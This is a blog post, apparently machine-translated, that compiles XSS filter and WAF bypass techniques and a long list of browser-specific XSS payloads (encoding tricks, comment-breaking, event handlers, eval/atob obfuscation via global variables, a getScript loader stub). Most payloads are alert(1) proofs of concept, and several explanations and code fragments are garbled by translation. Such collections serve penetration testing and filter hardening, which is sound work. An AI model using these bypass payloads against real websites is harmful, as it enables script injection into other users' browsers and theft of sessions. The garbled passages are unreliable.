Simple WAF summary of XSS

Posted by zysac on Mon, 03 Jan 2022 09:10:04 +0100

1, General test methods#

0. General: insert as soon as you see the box
1. Input some simple characters in the input box, such as aaa, to facilitate the subsequent search for the output position
2. Press F12 to open the developer mode, and press ctrl+F to search aaa
3. In most cases, it is in the value="aaa" of the tag, or it is included in some other tags independently, such as div, span, etc
4. Construct a payload according to a specific situation, generally directly construct a label or close a label, reconstruct it or use a pseudo protocol, etc

2, Common skills#

1.JS pseudo protocol utilization
Form: javascript: [Code]
Example: < table background = "javascript: Alert (1)" > < / Table >, quotation marks can be removed
Attributes that support pseudo protocols include: href, lowsrc, bgSound, background, action, and dynsrc

2. Blacklist based filtering
① In js code, use the space, enter and tab keys. Remember that only the js code wrapped in "" can use the space, enter and tab keys freely, such as src = "java script:xxxx", but not like this: src=java script:xxxx
Moreover, carriage return and line feed are not supported in on events, and spaces can be used

js engine feature: js statements usually end with a semicolon, but if the engine judges that a statement is complete and there is a newline character at the end, the semicolon can be omitted


var a = 1
var b = 2;
//The above statement is correct

Example: < img SRC = "Javas script: Alert (1)" >, with tab in the middle

    Used to bypass certain XSS protect
<img src="jav   ascript:alert('XSS');">

    You can also be right TAB code
<img src="jav&#x09;ascript:alert('XSS');">

    Disassemble with line breaks
<img src="jav&#x0A;ascript:alert('XSS');">

    Disassemble with enter
<img src="jav&#x0D;ascript:alert('XSS');">

② Case confusion

Example: < img SRC onerror = alert (1) >

③ Code bypass

Not yet

④ Strange sexual skills

1. Filter quotation marks
Strategy: double quotation marks cannot be single quotation marks; No single quotation marks, no quotation marks; Don't use quotation marks. If you can't, try back quotation marks (IE support)

2. Filter spaces
Policy: / * * /, annotation symbol bypass/ Symbol bypass;
Example: < img / SRC / onerror = alert (1) >

3. Attribute keywords are filtered
Policy: insert / * * /, \, \ 0


//2.\,\ 0 can only be used in css style \ js, and both will be ignored by the browser

4.<!-- --> Comment bypass
<!--<img src="--><img src onerror=alert(1)//">

<style><img src="</style><img src onerror=alert(1)//">

5. Use jsluck to bypass keyword filtering


3.js event execution code
Example: < img SRC onerror = alert (1) >
js events: oneror, onclick, OnMouseOver, onkeydown·········
Other event query:

4. Cross site using css (style attribute or style tag)

① Direct execution

The url in the attribute is used, which is similar to the pseudo protocol




② Using expression under IE

Explanation: expression is used to associate CSS attributes with js expressions. CSS attributes can be inherent attributes of elements or user-defined attributes, as shown in examples 1 and 2 below,





③ Reference external css file to execute xss


//1. Using the link tag

//2. Import with @ import

//3.@import feature – execute js code directly

3, Update content – use JS global variables to bypass XSS filters#

Original address: 🤑 Bypassing filters with JS global variables 🤑

JavaScript global variables are declared outside functions or through window objects. It can be accessed from any function!
Global variables include: self, document, this, top and window


//js code

Self ["\ X65 \ x76 \ x61 \ X6C"] -- > eval() function
The self ["\ x61 \ x74 \ x6f \ X62"] -- > atob() method is used to decode a string encoded with base-64.
A large string of base64 strings is:
var head = document.getElementsByTagName('head').item(0);
var script = document.createElement('script');
script.setAttribute('type', 'text/javascript');

More than one tag element can be created. Those who understand js code can customize the elements to be created
3. Use frameworks such as jQuery#
1).self["$"]"jQuery method"


//After coding:

self [" $"] [" getScript"]("")

2). Object. The keys () method calls the function
Object.keys() can call various functions and methods according to the passed index value, so that we can call any function without using its name
On the console, enter object Keys (self) to view the methods supported by all self objects

Of course, you can also enter the code to view it more intuitively

for(i in self) {
if(typeof self[i] != '') {

You can also directly query the index value of a specific function through this
For example: find alert function

c=0; for(i in self) { if(i == "alert") { console.log©; } c++; }
Object.keys(self)145 Represents alert(1)
Then call on the console:

4. How to use it? Where is the utilization point#
Construct a special payload to bypass waf

If you simply want to insert

4, Some strange functions and features in JS#

It's also alert(1). Why are you so excellent?


5, New content (no typesetting)#

Original address: 🤑 Talking about XSS bypass posture 🤑

1.US-ASCII coding

2. Rewrite bypass
When the waf filtering method is to replace some keywords with empty ones, you can try nesting. For example, if you filter script keywords, you can try scscriptrip

3. Use context and notes to break through the word limit

Comment 1:


4. When angle bracket pairs are filtered
Use / / to bypass: <body/οnlοad=alert(1)//
This is equivalent to closing an incomplete payload with / / instead of the > symbol

6. Use the fromercoded method to bypass the quotation mark limit

7. Bypass the filter by mixing


8. Double half open bracket bypass

9. Use & JavaScript includes

10. Some payload s summarized by the boss

The following 9 sets in

I can't understand it here 😁
It can be seen that JS skills are indispensable to learn XSS well

6, XSS Payload#


Wait, wait
Add payload from HTML5Security

Only part of the web page was tested payload,stay Chorme,Firefox Test on the browser, and the following test sample codes are successfully executed

#Chrome, Opera, Safari and Edge
<div onfocus="alert(1)" contenteditable tabindex="0" id="xss"></div>
<div style="-webkit-user-modify:read-write" onfocus="alert(1)" id="xss">
<div style="-webkit-user-modify:read-write-plaintext-only" onfocus="alert(1)" id="xss">

# Firefox
<div onbeforescriptexecute="alert(1)"></div>

#MSIE10/11 & Edge
<div style="-ms-scroll-limit:1px;overflow:scroll;width:1px" onscroll="alert(1)">

<div contenteditable onresize="alert(1)"></div>

# MSIE11
<div onactivate="alert(1)" id="xss" style="overflow:scroll"></div>
<div onfocus="alert(1)" id="xss" style="display:table">
<div id="xss" style="-ms-block-progression:bt" onfocus="alert(1)">
<div id="xss" style="-ms-layout-flow:vertical-ideographic" onfocus="alert(1)">
<div id="xss" style="float:left" onfocus="alert(1)">

# Chrome, Opera, Safari
<style>@keyframes x{}</style>
<div style="animation-name:x" onanimationstart="alert(1)"></div>

# Chrome, Opera, Safari
div {width: 100px;}
div:target {width: 200px;}
<div id="xss" onwebkittransitionend="alert(1)" style="-webkit-transition: width .1s;"></div>

# Safari
<div style="overflow:-webkit-marquee" onscroll="alert(1)"></div>


<!--<iframe srcdoc="&lt;script&gt;alert('XSS')&lt;/script&gt;"></iframe>-->
<!--<input onfocus=write(1) autofocus>-->

<!--<object classid="clsid:333c7bc4-460f-11d0-bc04-0080c7055a83">-->
<!--    <param name="dataurl" value="javascript:alert('Barret Li Jing')">-->

<!--<p class="comment" title=""><script>/*"></p>-->
<!--<p class="comment" title="*/prompt(/*"></p>-->
<!--<p class="comment" title="*/1);/*"></p>-->
<!--<p class="comment" title="*/</script>"></p>-->


<!--<img src=x onerror=outerHTML=URL>#<img src=x onerror=alert(/xss/)>-->

<!--utilize fromeCharCoded Method bypasses quotation mark restrictions-->
<!--<img src=javascript:alert(String.fromCharCode(88,83,83))>-->

<!--    utilize& JavaScript includes-->
<!--    <br size="&{alert('XSS')}">-->
<!--<a href="j&#x61vascript: //%0&#x61 &#x00025;61lert(1)">click me</a>-->
<!--<img src="1" onerror="al\u0065rt(1)" />-->
<!--<img src="1" onerror="\u0061\u006c\u0065\u0072\u0074(1)" />-->
<!--<a href="j&#x61vascript: //%0&#x61;&#x00025;61l\u0065rt(1)">click me</a>-->
<!--        <a><svg><path><animateMotion/onend='[1].map(alert)' dur='1s'repeatCount=1></a>-->
<!--<form id="test"></form><button form="test" formaction="javascript:alert(1)">X</button>-->
<!--<input onfocus=write(1) autofocus>-->
<!--<input onblur=write(1) autofocus><input autofocus>-->
<!--<video poster=javascript:alert(1)//></video>    opera 10.5+-->
<!--<body onscroll=alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><input autofocus>-->
<!--<form id=test onforminput=alert(1)><input></form><button form=test onformchange=alert(2)>X</button>     opera10.5 12.0-->
<!--<video><source onerror="alert(1)">-->
<!--<video onerror="alert(1)"><source></source></video>   <audio>Or Firefox ie-->
<!--<form><button formaction="javascript:alert(1)">X</button>-->
<!--<body oninput=alert(1)><input autofocus>-->
<!--<math href="javascript:alert(1)">CLICKME</math>  Firefox-->

    <maction actiontype="statusline#" xlink:href="javascript:alert(2)">CLICKME</maction>-->
<!--<iframe srcdoc="&lt;img src&equals;x:x onerror&equals;alert&lpar;1&rpar;&gt;" />-->

<!--<picture><source srcset="x"><img onerror="alert(1)"></picture>
<picture><img srcset="x" onerror="alert(1)"></picture>
<img srcset=",,,,,x" onerror="alert(1)">-->

<!--<iframe srcdoc="<svg onload=alert(1)&nvgt;"></iframe>-->
<!--<a href="javascript:&apos;<svg onload&equals;alert&lpar;1&rpar;&nvgt;&apos;">CLICK</a>-->

<!--&nvlt; &nvgt;-->

<!--<details open ontoggle="alert(1)">-->

<!--  <frameset onload=alert(1)>     iframe body nothing src Property can also be triggered onload event-->

<!--<table background="javascript:alert(1)"></table>    ie opera-->

<!--&lt;!&ndash;<img src="&ndash;&gt;<img src=x onerror=alert(1)//">-->

<!--<comment><img src="</comment><img src=x onerror=alert(1)//">          ie-->

<!--<![><img src="]><img src=x onerror=alert(1)//"> it doesn't seem to work -- >

<!--<svg><![CDATA[><image xlink:href="]]><img src=xx:x onerror=alert(2)//"></svg>-->

<!--<style><img src="</style><img src=x onerror=alert(1)//">-->

<!--<li style=list-style:url() onerror=alert(1)></li>
<div style=content:url(data:image/svg+xml,%3Csvg/%3E);visibility:hidden onload=alert(1)></div>    opera-->

<!--<head><base href="javascript://"/></head><body><a href="/. /,alert(1)//#">XXX</a></body>  opera ie safari-->

<!--<OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(1)"></OBJECT>   ie6/9 -->

<!--<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>-->

<!--<embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></embed>-->

<!--<embed src="javascript:alert(1)"></embed> // Firefox only-->

<!--<b <script>alert(1)//< / script > 0 < / script > < / b > nested tags failed -- >

<!--<div id="div1"><input value="``onmouseover=alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script>  ie-->

<!--<div style=width:1px;filter:glow onfilterchange=alert(1)>x</div>  ie-->

<? foo="><script>alert(1)</script>">
<! foo="><script>alert(1)</script>">
</ foo="><script>alert(1)</script>">-->

<? foo="><x foo='?><script>alert(1)</script>'>">
<! foo="[[[x]]"><x foo="]foo><script>alert(1)</script>">
<% foo><x foo="%><script>alert(1)</script>">
It doesn't seem to work

[a]Acceptable as label name/The character of the property separator. Firefox,Internet Explorer,Safari,Google Chrome,Opera: 9,10,12,13,32,47 Internet Explorer(5-9 SM): 11 [b]Characters are ignored before attributes (and are not accepted as arguments/Property separator). Firefox,Internet Explorer,Safari,Google Chrome,Opera: 47 Internet Explorer(5-9 SM): 0 ** [c]Ignore characters between attribute names and equal signs. Firefox,Internet Explorer,Safari,Google Chrome,Opera: 9,10,12,13,32 Internet Explorer(5-9 SM): 0,11 [d]Accept as parameter/The character of the property separator. Firefox,Internet Explorer,Safari,Google Chrome,Opera: 9,10,12,13,32 Internet Explorer(5-9 SM): 11 [e]Characters between equal sign and parameter are ignored. Firefox,Internet Explorer,Safari,Google Chrome,Opera: 9,10,12,13,32 Internet Explorer(5-9 SM): 0,11 *Characters in decimal ASCII Table index form.**There is a general rule that IE HTML The parser does not have an uncoded null character.
          It didn't work

<!--<a href="[a]java[b]script[c]:alert(1)">XXX</a>
URI sheme Ignore the following characters in*: [a]All mentioned browsers: 9,10,13,32 IE,GC,Safari,Opera: 11,12 IE,GC,Safari,FF 3.6.28↓: 8 IE ,GC,Safari: 1-7,14-31 Opera: 160,5760,6158,8192-8202,8232,8233,8239,8287,12288 Opera 11.52↓: 6159 IE(5-9 SM): 0 [b] ,[c] IE,GC,Safari 4.0.3↓,FF 4-6,Opera 10.63↓: 9,10,13 GC 7↓,Safari 4.0.3↓: 1-8,11,12 IE(5-9 SM): 0 Safari 4.0.4↑,Opera 11↑,FF 7↑: nothing*Characters in decimal ASCII Table index form.
       It didn't work

<!--<frameset onpageshow="alert(1)">-->

<!--<body onpageshow="alert(1)">-->

<!--<applet onerror="alert(1)"></applet>    ie   -->

<!--<a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="alert(1);">XXX</a></a><a href="javascript:alert(2)">XXX</a>-->

<!--<div style="\63&#9\06f&#10\0006c&#12\00006F&#13\R:\000072 Ed;color\0\bla:yellow\0\bla;col\0\00 \&#xA0or:blue;">XXX</div>-->

<!--<script>ReferenceError.prototype.__defineGetter__('name', function(){alert(1)}),x</script>   chrome Press f12 Execute Firefox direct execution-->


<!--<svg xmlns=""><script>alert(1)</script></svg>-->

<!--<svg onload="javascript:alert(1)" xmlns=""></svg>-->

    <a xmlns:xlink="" xlink:href="?">
        <circle r="400"></circle>
        <animate attributeName="xlink:href" begin="0" from="javascript:alert(1)" to="&" />

<!--<?xml-stylesheet href="javascript:alert(1)"?><root/>      opera-->

<!--<input onblur=focus() autofocus><input>-->



// eval.apply`${[`alert\x283\x29`]}`
// setTimeout`alert\x284\x29`
// setInterval`alert\x285\x29`
// onerror=alert;throw 6;
// 'alert\x287\x29'instanceof{[Symbol.hasInstance]:eval}
// onerror=eval;throw'=alert\x288\x29';
// {onerror=alert}throw 9

    // {onerror=eval}throw{lineNumber:1,columnNumber:1,fileName:'',message:'alert\x2823\x29'}



Topics: xss